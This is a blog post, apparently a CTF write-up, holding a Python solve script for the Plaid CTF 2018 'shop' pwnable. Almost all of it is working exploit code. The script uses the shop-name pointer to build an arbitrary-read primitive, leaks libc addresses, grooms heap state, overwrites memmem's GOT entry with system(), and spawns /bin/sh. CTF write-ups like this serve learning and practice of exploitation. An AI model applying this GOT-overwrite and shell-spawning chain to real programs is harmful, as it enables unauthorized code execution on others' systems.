[Plaid CTF 2018] shop python solve code 2
MyriaBreak
2018. 5. 22. 23:38
Solve script, version 2 (pwntools, Python 2-style `str` handling). Note that it resolves libc offsets from the local `/lib/x86_64-linux-gnu/libc.so.6`; against a remote instance the challenge's own libc must be loaded instead.
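#!/usr/bin/env python
"""Plaid CTF 2018 "shop" solve script (version 2), pwntools / Python 2.

Flow, as implemented below:

  1. register a shop name and add 33 items;
  2. check out with a 0x10000-byte de Bruijn item-ID string (All_ItemIDs);
  3. repoint the shop name at chosen addresses and use the item listing as
     an arbitrary read: fread@got -> libc base, plus the stdin/stdout FILE
     pointers held in ./shop's .bss;
  4. check out again with the last four ID bytes replaced by the low half
     of the leaked stdout pointer;
  5. rename the shop with a forged buffer whose last qword is memmem@got,
     rename once more with the address of system(), and check out with
     "/bin/sh" as the ID string so the call that used to be memmem() is
     now system("/bin/sh").

Why each memory-corruption step works is a property of the target binary
and is not visible from this script (see the accompanying write-up). The
-44/-12 adjustments and the .bss addresses 0x6020C0/0x6020D0 are specific
to this (non-PIE) build of ./shop, and the GOT overwrite in step 5 needs a
writable GOT (no Full RELRO).
"""
from pwn import *
import string

# libc used to compute offsets. It MUST be the libc of the target: for a
# remote instance load the libc shipped with the challenge (the ./libc.so.6
# line) -- offsets from the local libc will simply be wrong.
lib = ELF("/lib/x86_64-linux-gnu/libc.so.6")
#lib = ELF("./libc.so.6")
elf = ELF("./shop")
conn = process("./shop")


def AddItem(item, description="nothing", price="1"):
    """Add one item via menu option 'a'; all three fields are sent as text."""
    conn.sendlineafter("> ", "a")
    conn.sendline(item)
    conn.sendline(description)
    conn.sendline(price)


def CheckoutAllItem(item_IDs):
    """Check out (menu option 'c') with the raw item-ID string `item_IDs`.

    Returns a pair: everything received up to and including "TOTAL: $",
    and the total as a string with the trailing "." stripped.
    """
    conn.sendline("c")
    conn.sendline(item_IDs)
    result = conn.recvuntil("TOTAL: $")
    total = conn.recvuntil(".")
    return (result, total[:-1])


def ListItem():
    """Print the item list (menu option 'l') and return it raw, up to the next prompt."""
    conn.sendlineafter("> ", "l")
    listing = conn.recvuntil("> ")
    return listing


def RenameShop(name):
    """Rename the shop (menu option 'n') with the raw bytes `name`."""
    conn.sendline("n")
    conn.sendlineafter('Enter your shop name:', name)


def LeakQword(ptr, sep, field):
    """Arbitrary read of one qword.

    Sets the shop name to the 8-byte pointer `ptr`, lists the items, and
    parses the leaked bytes out of the second-to-last listing line:
    `line.split(sep)[field]`. The leak is presumably emitted with %s-style
    printing (it stops at the first NUL), so it is zero-padded to 8 bytes
    before unpacking.

    Aborts (pwntools' log.error raises) on an empty leak, which would
    otherwise decode silently as 0 and derail every address derived from
    it, and on a leak longer than 8 bytes, which means the parse picked
    the wrong column.
    """
    RenameShop(p64(ptr))
    line = ListItem().split("\n")[-2]
    leak = line.split(sep)[field]
    if not leak:
        log.error("empty leak at 0x%x, listing line was %r" % (ptr, line))
    if len(leak) > 8:
        log.error("leak at 0x%x is longer than 8 bytes: %r" % (ptr, leak))
    return u64(leak.ljust(8, "\x00"))


# ---- setup: register a name and populate the shop ----
conn.sendlineafter('Enter your shop name:', "myria")
for i in range(33):
    AddItem(str(i))

# de Bruijn sequence over the hex digits with unique 4-byte subsequences,
# so any 4-byte value that later shows up can be located with cyclic_find.
All_ItemIDs = cyclic(0x10000, alphabet='0123456789abcdef', n=4)
result, total = CheckoutAllItem(All_ItemIDs)
log.info("Checkout : %s" % total)

# ---- leaks via the shop-name pointer ----
# The -44 / -12 adjustments position the pointer so that the field the
# listing prints lands on the target qword (layout of the shop-name record;
# inferred from the working offsets -- confirm against the binary).
fread_got = elf.got["fread"]
memmem_got = elf.got["memmem"]
log.info("fread.got : 0x%x" % fread_got)
fread_addr = LeakQword(fread_got - 44, " - ", 1)

# Address of the stdin FILE* global in ./shop's .bss (hard-coded for this build).
stdin = 0x6020D0
stdin_leaked = LeakQword(stdin - 44, " - ", 1)

# Address of the stdout FILE* global in ./shop's .bss (hard-coded for this build).
stdout = 0x6020C0
stdout_addr = LeakQword(stdout - 12, ":", 0)

fread_offset = lib.symbols['fread']
memmem_offset = lib.symbols['memmem']
system_offset = lib.symbols['system']
stdout_offset = lib.symbols['_IO_2_1_stdout_']
stdin_offset = lib.symbols['_IO_2_1_stdin_']

base_addr = fread_addr - fread_offset
memmem_addr = base_addr + memmem_offset
system_addr = base_addr + system_offset
# The stdin address written into the forged buffer is recomputed from the
# libc base rather than taken from the leak; the leak is kept as a check.
stdin_addr = base_addr + stdin_offset

# Sanity check on the libc choice: the leaked FILE pointers must agree with
# base + symbol offset from `lib`. A mismatch almost always means `lib` is
# not the target's libc (or the base leak is off), and the final overwrite
# would then hit a random address.
if stdin_leaked != stdin_addr:
    log.warning("leaked stdin 0x%x != computed 0x%x: wrong libc?" % (stdin_leaked, stdin_addr))
if stdout_addr != base_addr + stdout_offset:
    log.warning("leaked stdout 0x%x != computed 0x%x: wrong libc?" % (stdout_addr, base_addr + stdout_offset))

for label, addr in [("base_addr", base_addr), ("fread", fread_addr),
                    ("memmem", memmem_addr), ("system", system_addr),
                    ("stdout", stdout_addr), ("stdin", stdin_addr)]:
    log.info("%9s : 0x%x" % (label, addr))
print("")

# ---- heap grooming ----
# Rename with a pointer 8 bytes below the stdout slot, then check out with
# the low 4 bytes of the leaked stdout address spliced into the ID string.
# What this does to the allocator state is target-specific (write-up).
ghost = stdout - 8
RenameShop(p64(ghost) + "@@@@" + "A")
result, total = CheckoutAllItem(All_ItemIDs[4:] + p64(stdout_addr)[:4])
log.info("Checkout : %s" % total)
print(result)

# ---- forged buffer -> GOT overwrite ----
# The last qword is memmem@got: after this rename, the next rename's input
# is written there (so the second RenameShop plants system()).
exploit = "".join([
    "\x00" * 8,
    p64(stdout_addr),
    p64(0x0),
    p64(stdin_addr),
    p64(0x0),
    p64(0x0) * 32,
    p64(memmem_got),   # checkout item
])
RenameShop(exploit)
RenameShop(p64(system_addr))

# Checkout presumably passes the ID string to memmem(), which now resolves
# to system(); "/bin/sh" as the ID string therefore spawns a shell.
conn.sendline("c")
conn.sendline("/bin/sh")
conn.interactive()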